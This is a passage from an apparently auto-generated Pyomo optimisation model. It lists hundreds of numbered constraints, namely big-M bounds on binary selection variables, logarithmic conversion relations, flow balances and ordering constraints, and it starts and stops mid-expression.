<= 0) m.c2131 = Constraint(expr= m.x1372 - 1.18887736200171*m.b1555 <= 0) m.c2132 = Constraint(expr= m.x1373 + 1.18887736200171*m.b1553 <= 1.18887736200171) m.c2133 = Constraint(expr= m.x1374 + 1.18887736200171*m.b1554 <= 1.18887736200171) m.c2134 = Constraint(expr= m.x1375 + 1.18887736200171*m.b1555 <= 1.18887736200171) m.c2135 = Constraint(expr= m.x1382 - 0.940066550763924*m.b1553 <= 0) m.c2136 = Constraint(expr= m.x1383 - 0.940066550763924*m.b1554 <= 0) m.c2137 = Constraint(expr= m.x1384 - 0.940066550763924*m.b1555 <= 0) m.c2138 = Constraint(expr= m.x1385 + 0.940066550763924*m.b1553 <= 0.940066550763924) m.c2139 = Constraint(expr= m.x1386 + 0.940066550763924*m.b1554 <= 0.940066550763924) m.c2140 = Constraint(expr= m.x1387 + 0.940066550763924*m.b1555 <= 0.940066550763924) m.c2141 = Constraint(expr= - 0.75*m.x1388 + m.x1412 == 0) m.c2142 = Constraint(expr= - 0.75*m.x1389 + m.x1413 == 0) m.c2143 = Constraint(expr= - 0.75*m.x1390 + m.x1414 == 0) m.c2144 = Constraint(expr= m.x1391 == 0) m.c2145 = Constraint(expr= m.x1392 == 0) m.c2146 = Constraint(expr= m.x1393 == 0) m.c2147 = Constraint(expr= m.x1415 == 0) m.c2148 = Constraint(expr= m.x1416 == 0) m.c2149 = Constraint(expr= m.x1417 == 0) m.c2150 = Constraint(expr= m.x1055 - m.x1388 - m.x1391 == 0) m.c2151 = Constraint(expr= m.x1056 - m.x1389 - m.x1392 == 0) m.c2152 = Constraint(expr= m.x1057 - m.x1390 - m.x1393 == 0) m.c2153 = Constraint(expr= m.x1067 - m.x1412 - m.x1415 == 0) m.c2154 = Constraint(expr= m.x1068 - m.x1413 - m.x1416 == 0) m.c2155 = Constraint(expr= m.x1069 - m.x1414 - m.x1417 == 0) m.c2156 = Constraint(expr= m.x1388 - 0.940066550763924*m.b1556 <= 0) m.c2157 = Constraint(expr= m.x1389 - 0.940066550763924*m.b1557 <= 0) m.c2158 = Constraint(expr= m.x1390 - 0.940066550763924*m.b1558 <= 0) m.c2159 = Constraint(expr= m.x1391 + 0.940066550763924*m.b1556 <= 0.940066550763924) m.c2160 = Constraint(expr= m.x1392 + 0.940066550763924*m.b1557 <= 0.940066550763924) m.c2161 = Constraint(expr= m.x1393 + 0.940066550763924*m.b1558 <= 0.940066550763924) m.c2162 = Constraint(expr= m.x1412 - 0.705049913072943*m.b1556 <= 0) m.c2163 = Constraint(expr= m.x1413 - 0.705049913072943*m.b1557 <= 0) m.c2164 = Constraint(expr= m.x1414 - 0.705049913072943*m.b1558 <= 0) m.c2165 = Constraint(expr= m.x1415 + 0.705049913072943*m.b1556 <= 0.705049913072943) m.c2166 = Constraint(expr= m.x1416 + 0.705049913072943*m.b1557 <= 0.705049913072943) m.c2167 = Constraint(expr= m.x1417 + 0.705049913072943*m.b1558 <= 0.705049913072943) m.c2168 = Constraint(expr=(m.x1418/(0.001 + 0.999*m.b1559) - 1.5*log(1 + m.x1394/(0.001 + 0.999*m.b1559)))*(0.001 + 0.999*m.b1559) <= 0) m.c2169 = Constraint(expr=(m.x1419/(0.001 + 0.999*m.b1560) - 1.5*log(1 + m.x1395/(0.001 + 0.999*m.b1560)))*(0.001 + 0.999*m.b1560) <= 0) m.c2170 = Constraint(expr=(m.x1420/(0.001 + 0.999*m.b1561) - 1.5*log(1 + m.x1396/(0.001 + 0.999*m.b1561)))*(0.001 + 0.999*m.b1561) <= 0) m.c2171 = Constraint(expr= m.x1397 == 0) m.c2172 = Constraint(expr= m.x1398 == 0) m.c2173 = Constraint(expr= m.x1399 == 0) m.c2174 = Constraint(expr= m.x1424 == 0) m.c2175 = Constraint(expr= m.x1425 == 0) m.c2176 = Constraint(expr= m.x1426 == 0) m.c2177 = Constraint(expr= m.x1058 - m.x1394 - m.x1397 == 0) m.c2178 = Constraint(expr= m.x1059 - m.x1395 - m.x1398 == 0) m.c2179 = Constraint(expr= m.x1060 - m.x1396 - m.x1399 == 0) m.c2180 = Constraint(expr= m.x1070 - m.x1418 - m.x1424 == 0) m.c2181 = Constraint(expr= m.x1071 - m.x1419 - m.x1425 == 0) m.c2182 = Constraint(expr= m.x1072 - m.x1420 - m.x1426 == 0) m.c2183 = Constraint(expr= m.x1394 - 0.940066550763924*m.b1559 <= 0) m.c2184 = Constraint(expr= m.x1395 - 0.940066550763924*m.b1560 <= 0) m.c2185 = Constraint(expr= m.x1396 - 0.940066550763924*m.b1561 <= 0) m.c2186 = Constraint(expr= m.x1397 + 0.940066550763924*m.b1559 <= 0.940066550763924) m.c2187 = Constraint(expr= m.x1398 + 0.940066550763924*m.b1560 <= 0.940066550763924) m.c2188 = Constraint(expr= m.x1399 + 0.940066550763924*m.b1561 <= 0.940066550763924) m.c2189 = Constraint(expr= m.x1418 - 0.994083415506506*m.b1559 <= 0) m.c2190 = Constraint(expr= m.x1419 - 0.994083415506506*m.b1560 <= 0) m.c2191 = Constraint(expr= m.x1420 - 0.994083415506506*m.b1561 <= 0) m.c2192 = Constraint(expr= m.x1424 + 0.994083415506506*m.b1559 <= 0.994083415506506) m.c2193 = Constraint(expr= m.x1425 + 0.994083415506506*m.b1560 <= 0.994083415506506) m.c2194 = Constraint(expr= m.x1426 + 0.994083415506506*m.b1561 <= 0.994083415506506) m.c2195 = Constraint(expr= - m.x1400 + m.x1430 == 0) m.c2196 = Constraint(expr= - m.x1401 + m.x1431 == 0) m.c2197 = Constraint(expr= - m.x1402 + m.x1432 == 0) m.c2198 = Constraint(expr= - 0.5*m.x1406 + m.x1430 == 0) m.c2199 = Constraint(expr= - 0.5*m.x1407 + m.x1431 == 0) m.c2200 = Constraint(expr= - 0.5*m.x1408 + m.x1432 == 0) m.c2201 = Constraint(expr= m.x1403 == 0) m.c2202 = Constraint(expr= m.x1404 == 0) m.c2203 = Constraint(expr= m.x1405 == 0) m.c2204 = Constraint(expr= m.x1409 == 0) m.c2205 = Constraint(expr= m.x1410 == 0) m.c2206 = Constraint(expr= m.x1411 == 0) m.c2207 = Constraint(expr= m.x1433 == 0) m.c2208 = Constraint(expr= m.x1434 == 0) m.c2209 = Constraint(expr= m.x1435 == 0) m.c2210 = Constraint(expr= m.x1061 - m.x1400 - m.x1403 == 0) m.c2211 = Constraint(expr= m.x1062 - m.x1401 - m.x1404 == 0) m.c2212 = Constraint(expr= m.x1063 - m.x1402 - m.x1405 == 0) m.c2213 = Constraint(expr= m.x1064 - m.x1406 - m.x1409 == 0) m.c2214 = Constraint(expr= m.x1065 - m.x1407 - m.x1410 == 0) m.c2215 = Constraint(expr= m.x1066 - m.x1408 - m.x1411 == 0) m.c2216 = Constraint(expr= m.x1073 - m.x1430 - m.x1433 == 0) m.c2217 = Constraint(expr= m.x1074 - m.x1431 - m.x1434 == 0) m.c2218 = Constraint(expr= m.x1075 - m.x1432 - m.x1435 == 0) m.c2219 = Constraint(expr= m.x1400 - 0.940066550763924*m.b1562 <= 0) m.c2220 = Constraint(expr= m.x1401 - 0.940066550763924*m.b1563 <= 0) m.c2221 = Constraint(expr= m.x1402 - 0.940066550763924*m.b1564 <= 0) m.c2222 = Constraint(expr= m.x1403 + 0.940066550763924*m.b1562 <= 0.940066550763924) m.c2223 = Constraint(expr= m.x1404 + 0.940066550763924*m.b1563 <= 0.940066550763924) m.c2224 = Constraint(expr= m.x1405 + 0.940066550763924*m.b1564 <= 0.940066550763924) m.c2225 = Constraint(expr= m.x1406 - 30*m.b1562 <= 0) m.c2226 = Constraint(expr= m.x1407 - 30*m.b1563 <= 0) m.c2227 = Constraint(expr= m.x1408 - 30*m.b1564 <= 0) m.c2228 = Constraint(expr= m.x1409 + 30*m.b1562 <= 30) m.c2229 = Constraint(expr= m.x1410 + 30*m.b1563 <= 30) m.c2230 = Constraint(expr= m.x1411 + 30*m.b1564 <= 30) m.c2231 = Constraint(expr= m.x1430 - 15*m.b1562 <= 0) m.c2232 = Constraint(expr= m.x1431 - 15*m.b1563 <= 0) m.c2233 = Constraint(expr= m.x1432 - 15*m.b1564 <= 0) m.c2234 = Constraint(expr= m.x1433 + 15*m.b1562 <= 15) m.c2235 = Constraint(expr= m.x1434 + 15*m.b1563 <= 15) m.c2236 = Constraint(expr= m.x1435 + 15*m.b1564 <= 15) m.c2237 = Constraint(expr=(m.x1460/(0.001 + 0.999*m.b1565) - 1.25*log(1 + m.x1436/(0.001 + 0.999*m.b1565)))*(0.001 + 0.999*m.b1565) <= 0) m.c2238 = Constraint(expr=(m.x1461/(0.001 + 0.999*m.b1566) - 1.25*log(1 + m.x1437/(0.001 + 0.999*m.b1566)))*(0.001 + 0.999*m.b1566) <= 0) m.c2239 = Constraint(expr=(m.x1462/(0.001 + 0.999*m.b1567) - 1.25*log(1 + m.x1438/(0.001 + 0.999*m.b1567)))*(0.001 + 0.999*m.b1567) <= 0) m.c2240 = Constraint(expr= m.x1439 == 0) m.c2241 = Constraint(expr= m.x1440 == 0) m.c2242 = Constraint(expr= m.x1441 == 0) m.c2243 = Constraint(expr= m.x1463 == 0) m.c2244 = Constraint(expr= m.x1464 == 0) m.c2245 = Constraint(expr= m.x1465 == 0) m.c2246 = Constraint(expr= m.x1076 - m.x1436 - m.x1439 == 0) m.c2247 = Constraint(expr= m.x1077 - m.x1437 - m.x1440 == 0) m.c2248 = Constraint(expr= m.x1078 - m.x1438 - m.x1441 == 0) m.c2249 = Constraint(expr= m.x1091 - m.x1460 - m.x1463 == 0) m.c2250 = Constraint(expr= m.x1092 - m.x1461 - m.x1464 == 0) m.c2251 = Constraint(expr= m.x1093 - m.x1462 - m.x1465 == 0) m.c2252 = Constraint(expr= m.x1436 - 0.705049913072943*m.b1565 <= 0) m.c2253 = Constraint(expr= m.x1437 - 0.705049913072943*m.b1566 <= 0) m.c2254 = Constraint(expr= m.x1438 - 0.705049913072943*m.b1567 <= 0) m.c2255 = Constraint(expr= m.x1439 + 0.705049913072943*m.b1565 <= 0.705049913072943) m.c2256 = Constraint(expr= m.x1440 + 0.705049913072943*m.b1566 <= 0.705049913072943) m.c2257 = Constraint(expr= m.x1441 + 0.705049913072943*m.b1567 <= 0.705049913072943) m.c2258 = Constraint(expr= m.x1460 - 0.666992981045719*m.b1565 <= 0) m.c2259 = Constraint(expr= m.x1461 - 0.666992981045719*m.b1566 <= 0) m.c2260 = Constraint(expr= m.x1462 - 0.666992981045719*m.b1567 <= 0) m.c2261 = Constraint(expr= m.x1463 + 0.666992981045719*m.b1565 <= 0.666992981045719) m.c2262 = Constraint(expr= m.x1464 + 0.666992981045719*m.b1566 <= 0.666992981045719) m.c2263 = Constraint(expr= m.x1465 + 0.666992981045719*m.b1567 <= 0.666992981045719) m.c2264 = Constraint(expr=(m.x1466/(0.001 + 0.999*m.b1568) - 0.9*log(1 + m.x1442/(0.001 + 0.999*m.b1568)))*(0.001 + 0.999*m.b1568) <= 0) m.c2265 = Constraint(expr=(m.x1467/(0.001 + 0.999*m.b1569) - 0.9*log(1 + m.x1443/(0.001 + 0.999*m.b1569)))*(0.001 + 0.999*m.b1569) <= 0) m.c2266 = Constraint(expr=(m.x1468/(0.001 + 0.999*m.b1570) - 0.9*log(1 + m.x1444/(0.001 + 0.999*m.b1570)))*(0.001 + 0.999*m.b1570) <= 0) m.c2267 = Constraint(expr= m.x1445 == 0) m.c2268 = Constraint(expr= m.x1446 == 0) m.c2269 = Constraint(expr= m.x1447 == 0) m.c2270 = Constraint(expr= m.x1469 == 0) m.c2271 = Constraint(expr= m.x1470 == 0) m.c2272 = Constraint(expr= m.x1471 == 0) m.c2273 = Constraint(expr= m.x1079 - m.x1442 - m.x1445 == 0) m.c2274 = Constraint(expr= m.x1080 - m.x1443 - m.x1446 == 0) m.c2275 = Constraint(expr= m.x1081 - m.x1444 - m.x1447 == 0) m.c2276 = Constraint(expr= m.x1094 - m.x1466 - m.x1469 == 0) m.c2277 = Constraint(expr= m.x1095 - m.x1467 - m.x1470 == 0) m.c2278 = Constraint(expr= m.x1096 - m.x1468 - m.x1471 == 0) m.c2279 = Constraint(expr= m.x1442 - 0.705049913072943*m.b1568 <= 0) m.c2280 = Constraint(expr= m.x1443 - 0.705049913072943*m.b1569 <= 0) m.c2281 = Constraint(expr= m.x1444 - 0.705049913072943*m.b1570 <= 0) m.c2282 = Constraint(expr= m.x1445 + 0.705049913072943*m.b1568 <= 0.705049913072943) m.c2283 = Constraint(expr= m.x1446 + 0.705049913072943*m.b1569 <= 0.705049913072943) m.c2284 = Constraint(expr= m.x1447 + 0.705049913072943*m.b1570 <= 0.705049913072943) m.c2285 = Constraint(expr= m.x1466 - 0.480234946352917*m.b1568 <= 0) m.c2286 = Constraint(expr= m.x1467 - 0.480234946352917*m.b1569 <= 0) m.c2287 = Constraint(expr= m.x1468 - 0.480234946352917*m.b1570 <= 0) m.c2288 = Constraint(expr= m.x1469 + 0.480234946352917*m.b1568 <= 0.480234946352917) m.c2289 = Constraint(expr= m.x1470 + 0.480234946352917*m.b1569 <= 0.480234946352917) m.c2290 = Constraint(expr= m.x1471 + 0.480234946352917*m.b1570 <= 0.480234946352917) m.c2291 = Constraint(expr=(m.x1472/(0.001 + 0.999*m.b1571) - log(1 + m.x1421/(0.001 + 0.999*m.b1571)))*(0.001 + 0.999* m.b1571) <= 0) m.c2292 = Constraint(expr=(m.x1473/(0.001 + 0.999*m.b1572) - log(1 + m.x1422/(0.001 + 0.999*m.b1572)))*(0.001 + 0.999* m.b1572) <= 0) m.c2293 = Constraint(expr=(m.x1474/(0.001 + 0.999*m.b1573) - log(1 + m.x1423/(0.001 + 0.999*m.b1573)))*(0.001 + 0.999* m.b1573) <= 0) m.c2294 = Constraint(expr= m.x1427 == 0) m.c2295 = Constraint(expr= m.x1428 == 0) m.c2296 = Constraint(expr= m.x1429 == 0) m.c2297 = Constraint(expr= m.x1475 == 0) m.c2298 = Constraint(expr= m.x1476 == 0) m.c2299 = Constraint(expr= m.x1477 == 0) m.c2300 = Constraint(expr= m.x1070 - m.x1421 - m.x1427 == 0) m.c2301 = Constraint(expr= m.x1071 - m.x1422 - m.x1428 == 0) m.c2302 = Constraint(expr= m.x1072 - m.x1423 - m.x1429 == 0) m.c2303 = Constraint(expr= m.x1097 - m.x1472 - m.x1475 == 0) m.c2304 = Constraint(expr= m.x1098 - m.x1473 - m.x1476 == 0) m.c2305 = Constraint(expr= m.x1099 - m.x1474 - m.x1477 == 0) m.c2306 = Constraint(expr= m.x1421 - 0.994083415506506*m.b1571 <= 0) m.c2307 = Constraint(expr= m.x1422 - 0.994083415506506*m.b1572 <= 0) m.c2308 = Constraint(expr= m.x1423 - 0.994083415506506*m.b1573 <= 0) m.c2309 = Constraint(expr= m.x1427 + 0.994083415506506*m.b1571 <= 0.994083415506506) m.c2310 = Constraint(expr= m.x1428 + 0.994083415506506*m.b1572 <= 0.994083415506506) m.c2311 = Constraint(expr= m.x1429 + 0.994083415506506*m.b1573 <= 0.994083415506506) m.c2312 = Constraint(expr= m.x1472 - 0.690184503917672*m.b1571 <= 0) m.c2313 = Constraint(expr= m.x1473 - 0.690184503917672*m.b1572 <= 0) m.c2314 = Constraint(expr= m.x1474 - 0.690184503917672*m.b1573 <= 0) m.c2315 = Constraint(expr= m.x1475 + 0.690184503917672*m.b1571 <= 0.690184503917672) m.c2316 = Constraint(expr= m.x1476 + 0.690184503917672*m.b1572 <= 0.690184503917672) m.c2317 = Constraint(expr= m.x1477 + 0.690184503917672*m.b1573 <= 0.690184503917672) m.c2318 = Constraint(expr= - 0.9*m.x1448 + m.x1478 == 0) m.c2319 = Constraint(expr= - 0.9*m.x1449 + m.x1479 == 0) m.c2320 = Constraint(expr= - 0.9*m.x1450 + m.x1480 == 0) m.c2321 = Constraint(expr= m.x1451 == 0) m.c2322 = Constraint(expr= m.x1452 == 0) m.c2323 = Constraint(expr= m.x1453 == 0) m.c2324 = Constraint(expr= m.x1481 == 0) m.c2325 = Constraint(expr= m.x1482 == 0) m.c2326 = Constraint(expr= m.x1483 == 0) m.c2327 = Constraint(expr= m.x1082 - m.x1448 - m.x1451 == 0) m.c2328 = Constraint(expr= m.x1083 - m.x1449 - m.x1452 == 0) m.c2329 = Constraint(expr= m.x1084 - m.x1450 - m.x1453 == 0) m.c2330 = Constraint(expr= m.x1100 - m.x1478 - m.x1481 == 0) m.c2331 = Constraint(expr= m.x1101 - m.x1479 - m.x1482 == 0) m.c2332 = Constraint(expr= m.x1102 - m.x1480 - m.x1483 == 0) m.c2333 = Constraint(expr= m.x1448 - 15*m.b1574 <= 0) m.c2334 = Constraint(expr= m.x1449 - 15*m.b1575 <= 0) m.c2335 = Constraint(expr= m.x1450 - 15*m.b1576 <= 0) m.c2336 = Constraint(expr= m.x1451 + 15*m.b1574 <= 15) m.c2337 = Constraint(expr= m.x1452 + 15*m.b1575 <= 15) m.c2338 = Constraint(expr= m.x1453 + 15*m.b1576 <= 15) m.c2339 = Constraint(expr= m.x1478 - 13.5*m.b1574 <= 0) m.c2340 = Constraint(expr= m.x1479 - 13.5*m.b1575 <= 0) m.c2341 = Constraint(expr= m.x1480 - 13.5*m.b1576 <= 0) m.c2342 = Constraint(expr= m.x1481 + 13.5*m.b1574 <= 13.5) m.c2343 = Constraint(expr= m.x1482 + 13.5*m.b1575 <= 13.5) m.c2344 = Constraint(expr= m.x1483 + 13.5*m.b1576 <= 13.5) m.c2345 = Constraint(expr= - 0.6*m.x1454 + m.x1484 == 0) m.c2346 = Constraint(expr= - 0.6*m.x1455 + m.x1485 == 0) m.c2347 = Constraint(expr= - 0.6*m.x1456 + m.x1486 == 0) m.c2348 = Constraint(expr= m.x1457 == 0) m.c2349 = Constraint(expr= m.x1458 == 0) m.c2350 = Constraint(expr= m.x1459 == 0) m.c2351 = Constraint(expr= m.x1487 == 0) m.c2352 = Constraint(expr= m.x1488 == 0) m.c2353 = Constraint(expr= m.x1489 == 0) m.c2354 = Constraint(expr= m.x1085 - m.x1454 - m.x1457 == 0) m.c2355 = Constraint(expr= m.x1086 - m.x1455 - m.x1458 == 0) m.c2356 = Constraint(expr= m.x1087 - m.x1456 - m.x1459 == 0) m.c2357 = Constraint(expr= m.x1103 - m.x1484 - m.x1487 == 0) m.c2358 = Constraint(expr= m.x1104 - m.x1485 - m.x1488 == 0) m.c2359 = Constraint(expr= m.x1105 - m.x1486 - m.x1489 == 0) m.c2360 = Constraint(expr= m.x1454 - 15*m.b1577 <= 0) m.c2361 = Constraint(expr= m.x1455 - 15*m.b1578 <= 0) m.c2362 = Constraint(expr= m.x1456 - 15*m.b1579 <= 0) m.c2363 = Constraint(expr= m.x1457 + 15*m.b1577 <= 15) m.c2364 = Constraint(expr= m.x1458 + 15*m.b1578 <= 15) m.c2365 = Constraint(expr= m.x1459 + 15*m.b1579 <= 15) m.c2366 = Constraint(expr= m.x1484 - 9*m.b1577 <= 0) m.c2367 = Constraint(expr= m.x1485 - 9*m.b1578 <= 0) m.c2368 = Constraint(expr= m.x1486 - 9*m.b1579 <= 0) m.c2369 = Constraint(expr= m.x1487 + 9*m.b1577 <= 9) m.c2370 = Constraint(expr= m.x1488 + 9*m.b1578 <= 9) m.c2371 = Constraint(expr= m.x1489 + 9*m.b1579 <= 9) m.c2372 = Constraint(expr= 5*m.b1580 + m.x1670 == 0) m.c2373 = Constraint(expr= 4*m.b1581 + m.x1671 == 0) m.c2374 = Constraint(expr= 6*m.b1582 + m.x1672 == 0) m.c2375 = Constraint(expr= 8*m.b1583 + m.x1673 == 0) m.c2376 = Constraint(expr= 7*m.b1584 + m.x1674 == 0) m.c2377 = Constraint(expr= 6*m.b1585 + m.x1675 == 0) m.c2378 = Constraint(expr= 6*m.b1586 + m.x1676 == 0) m.c2379 = Constraint(expr= 9*m.b1587 + m.x1677 == 0) m.c2380 = Constraint(expr= 4*m.b1588 + m.x1678 == 0) m.c2381 = Constraint(expr= 10*m.b1589 + m.x1679 == 0) m.c2382 = Constraint(expr= 9*m.b1590 + m.x1680 == 0) m.c2383 = Constraint(expr= 5*m.b1591 + m.x1681 == 0) m.c2384 = Constraint(expr= 6*m.b1592 + m.x1682 == 0) m.c2385 = Constraint(expr= 10*m.b1593 + m.x1683 == 0) m.c2386 = Constraint(expr= 6*m.b1594 + m.x1684 == 0) m.c2387 = Constraint(expr= 7*m.b1595 + m.x1685 == 0) m.c2388 = Constraint(expr= 7*m.b1596 + m.x1686 == 0) m.c2389 = Constraint(expr= 4*m.b1597 + m.x1687 == 0) m.c2390 = Constraint(expr= 4*m.b1598 + m.x1688 == 0) m.c2391 = Constraint(expr= 3*m.b1599 + m.x1689 == 0) m.c2392 = Constraint(expr= 2*m.b1600 + m.x1690 == 0) m.c2393 = Constraint(expr= 5*m.b1601 + m.x1691 == 0) m.c2394 = Constraint(expr= 6*m.b1602 + m.x1692 == 0) m.c2395 = Constraint(expr= 7*m.b1603 + m.x1693 == 0) m.c2396 = Constraint(expr= 2*m.b1604 + m.x1694 == 0) m.c2397 = Constraint(expr= 5*m.b1605 + m.x1695 == 0) m.c2398 = Constraint(expr= 2*m.b1606 + m.x1696 == 0) m.c2399 = Constraint(expr= 4*m.b1607 + m.x1697 == 0) m.c2400 = Constraint(expr= 7*m.b1608 + m.x1698 == 0) m.c2401 = Constraint(expr= 4*m.b1609 + m.x1699 == 0) m.c2402 = Constraint(expr= 3*m.b1610 + m.x1700 == 0) m.c2403 = Constraint(expr= 9*m.b1611 + m.x1701 == 0) m.c2404 = Constraint(expr= 3*m.b1612 + m.x1702 == 0) m.c2405 = Constraint(expr= 7*m.b1613 + m.x1703 == 0) m.c2406 = Constraint(expr= 2*m.b1614 + m.x1704 == 0) m.c2407 = Constraint(expr= 9*m.b1615 + m.x1705 == 0) m.c2408 = Constraint(expr= 3*m.b1616 + m.x1706 == 0) m.c2409 = Constraint(expr= m.b1617 + m.x1707 == 0) m.c2410 = Constraint(expr= 9*m.b1618 + m.x1708 == 0) m.c2411 = Constraint(expr= 2*m.b1619 + m.x1709 == 0) m.c2412 = Constraint(expr= 6*m.b1620 + m.x1710 == 0) m.c2413 = Constraint(expr= 3*m.b1621 + m.x1711 == 0) m.c2414 = Constraint(expr= 4*m.b1622 + m.x1712 == 0) m.c2415 = Constraint(expr= 8*m.b1623 + m.x1713 == 0) m.c2416 = Constraint(expr= m.b1624 + m.x1714 == 0) m.c2417 = Constraint(expr= 2*m.b1625 + m.x1715 == 0) m.c2418 = Constraint(expr= 5*m.b1626 + m.x1716 == 0) m.c2419 = Constraint(expr= 2*m.b1627 + m.x1717 == 0) m.c2420 = Constraint(expr= 3*m.b1628 + m.x1718 == 0) m.c2421 = Constraint(expr= 4*m.b1629 + m.x1719 == 0) m.c2422 = Constraint(expr= 3*m.b1630 + m.x1720 == 0) m.c2423 = Constraint(expr= 5*m.b1631 + m.x1721 == 0) m.c2424 = Constraint(expr= 7*m.b1632 + m.x1722 == 0) m.c2425 = Constraint(expr= 6*m.b1633 + m.x1723 == 0) m.c2426 = Constraint(expr= 2*m.b1634 + m.x1724 == 0) m.c2427 = Constraint(expr= 8*m.b1635 + m.x1725 == 0) m.c2428 = Constraint(expr= 4*m.b1636 + m.x1726 == 0) m.c2429 = Constraint(expr= m.b1637 + m.x1727 == 0) m.c2430 = Constraint(expr= 4*m.b1638 + m.x1728 == 0) m.c2431 = Constraint(expr= m.b1639 + m.x1729 == 0) m.c2432 = Constraint(expr= 2*m.b1640 + m.x1730 == 0) m.c2433 = Constraint(expr= 5*m.b1641 + m.x1731 == 0) m.c2434 = Constraint(expr= 2*m.b1642 + m.x1732 == 0) m.c2435 = Constraint(expr= 9*m.b1643 + m.x1733 == 0) m.c2436 = Constraint(expr= 2*m.b1644 + m.x1734 == 0) m.c2437 = Constraint(expr= 9*m.b1645 + m.x1735 == 0) m.c2438 = Constraint(expr= 5*m.b1646 + m.x1736 == 0) m.c2439 = Constraint(expr= 8*m.b1647 + m.x1737 == 0) m.c2440 = Constraint(expr= 4*m.b1648 + m.x1738 == 0) m.c2441 = Constraint(expr= 2*m.b1649 + m.x1739 == 0) m.c2442 = Constraint(expr= 3*m.b1650 + m.x1740 == 0) m.c2443 = Constraint(expr= 8*m.b1651 + m.x1741 == 0) m.c2444 = Constraint(expr= 10*m.b1652 + m.x1742 == 0) m.c2445 = Constraint(expr= 6*m.b1653 + m.x1743 == 0) m.c2446 = Constraint(expr= 3*m.b1654 + m.x1744 == 0) m.c2447 = Constraint(expr= 4*m.b1655 + m.x1745 == 0) m.c2448 = Constraint(expr= 8*m.b1656 + m.x1746 == 0) m.c2449 = Constraint(expr= 7*m.b1657 + m.x1747 == 0) m.c2450 = Constraint(expr= 7*m.b1658 + m.x1748 == 0) m.c2451 = Constraint(expr= 3*m.b1659 + m.x1749 == 0) m.c2452 = Constraint(expr= 9*m.b1660 + m.x1750 == 0) m.c2453 = Constraint(expr= 4*m.b1661 + m.x1751 == 0) m.c2454 = Constraint(expr= 8*m.b1662 + m.x1752 == 0) m.c2455 = Constraint(expr= 6*m.b1663 + m.x1753 == 0) m.c2456 = Constraint(expr= 2*m.b1664 + m.x1754 == 0) m.c2457 = Constraint(expr= m.b1665 + m.x1755 == 0) m.c2458 = Constraint(expr= 3*m.b1666 + m.x1756 == 0) m.c2459 = Constraint(expr= 8*m.b1667 + m.x1757 == 0) m.c2460 = Constraint(expr= 3*m.b1668 + m.x1758 == 0) m.c2461 = Constraint(expr= 4*m.b1669 + m.x1759 == 0) m.c2462 = Constraint(expr= m.b1490 - m.b1491 <= 0) m.c2463 = Constraint(expr= m.b1490 - m.b1492 <= 0) m.c2464 = Constraint(expr= m.b1491 - m.b1492 <= 0) m.c2465 = Constraint(expr= m.b1493 - m.b1494 <= 0) m.c2466 = Constraint(expr= m.b1493 - m.b1495 <= 0) m.c2467 = Constraint(expr= m.b1494 - m.b1495 <= 0) m.c2468 = Constraint(expr= m.b1496 - m.b1497 <= 0) m.c2469 = Constraint(expr= m.b1496 - m.b1498 <= 0) m.c2470 = Constraint(expr= m.b1497 - m.b1498 <= 0) m.c2471 = Constraint(expr= m.b1499 - m.b1500 <= 0) m.c2472 = Constraint(expr= m.b1499 - m.b1501 <= 0) m.c2473 = Constraint(expr= m.b1500 - m.b1501 <= 0) m.c2474 = Constraint(expr= m.b1502 - m.b1503 <= 0) m.c2475 = Constraint(expr= m.b1502 - m.b1504 <= 0) m.c2476 = Constraint(expr= m.b1503 - m.b1504 <= 0) m.c2477 = Constraint(expr= m.b1505 - m.b1506 <= 0) m.c2478 = Constraint(expr= m.b1505 - m.b1507 <= 0) m.c2479 = Constraint(expr= m.b1506 - m.b1507 <= 0) m.c2480 = Constraint(expr= m.b1508 - m.b1509 <= 0) m.c2481 = Constraint(expr= m.b1508 - m.b1510 <= 0) m.c2482 = Constraint(expr= m.b1509 - m.b1510 <= 0) m.c2483 = Constraint(expr= m.b1511 - m.b1512 <= 0) m.c2484 = Constraint(expr= m.b1511 - m.b1513 <= 0) m.c2485 = Constraint(expr= m.b1512 - m.b1513 <= 0) m.c2486 = Constraint(expr= m.b1514 - m.b1515 <= 0) m.c2487 = Constraint(expr= m.b1514 - m.b1516 <= 0) m.c2488 = Constraint(expr= m.b1515 - m.b1516 <= 0) m.c2489 = Constraint(expr= m.b1517 - m.b1518 <= 0) m.c2490 = Constraint(expr= m.b1517 - m.b1519 <= 0) m.c2491 = Constraint(expr= m.b1518 - m.b1519 <= 0) m.c2492 = Constraint(expr= m.b1520 - m.b1521 <= 0) m.c2493 = Constraint(expr= m.b1520 - m.b1522 <= 0) m.c2494 = Constraint(expr= m.b1521 - m.b1522 <= 0) m.c2495 = Constraint(expr= m.b1523 - m.b1524 <= 0) m.c2496 = Constraint(expr= m.b1523 - m.b1525 <= 0) m.c2497 = Constraint(expr= m.b1524 - m.b1525 <= 0) m.c2498 = Constraint(expr= m.b1526 - m.b1527 <= 0) m.c2499 = Constraint(expr= m.b1526 - m.b1528 <= 0) m.c2500 = Constraint(expr= m.b1527 - m.b1528 <= 0) m.c2501 = Constraint(expr= m.b1529 - m.b1530 <= 0) m.c2502 = Constraint(expr= m.b1529 - m.b1531 <= 0) m.c2503 = Constraint(expr= m.b1530 - m.b1531 <= 0) m.c2504 = Constraint(expr= m.b1532 - m.b1533 <= 0) m.c2505 = Constraint(expr= m.b1532 - m.b1534 <= 0) m.c2506 = Constraint(expr= m.b1533 - m.b1534 <= 0) m.c2507 = Constraint(expr= m.b1535 - m.b1536 <= 0) m.c2508 = Constraint(expr= m.b1535 - m.b1537 <= 0) m.c2509 = Constraint(expr= m.b1536 - m.b1537 <= 0) m.c2510 = Constraint(expr= m.b1538 - m.b1539 <= 0) m.c2511 = Constraint(expr= m.b1538 - m.b1540 <= 0) m.c2512 = Constraint(expr= m.b1539 - m.b1540 <= 0) m.c2513 = Constraint(expr= m.b1541 - m.b1542 <= 0) m.c2514 = Constraint(expr= m.b1541 - m.b1543 <= 0) m.c2515 = Constraint(expr= m.b1542 - m.b1543 <= 0) m.c2516 = Constraint(expr= m.b1544 - m.b1545 <= 0) m.c2517 = Constraint(expr= m.b1544 - m.b1546 <= 0) m.c2518 = Constraint(expr= m.b1545 - m.b1546 <= 0) m.c2519 = Constraint(expr= m.b1547 - m.b1548 <= 0) m.c2520 = Constraint(expr= m.b1547 - m.b1549 <= 0) m.c2521 = Constraint(expr= m.b1548 - m.b1549 <= 0) m.c2522 = Constraint(expr= m.b1550 - m.b1551 <= 0) m.c2523 = Constraint(expr= m.b1550 - m.b1552 <= 0) m.c2524 = Constraint(expr= m.b1551 - m.b1552 <= 0) m.c2525 = Constraint(expr= m.b1553 - m.b1554 <= 0) m.c2526 = Constraint(expr= m.b1553 - m.b1555 <= 0) m.c2527 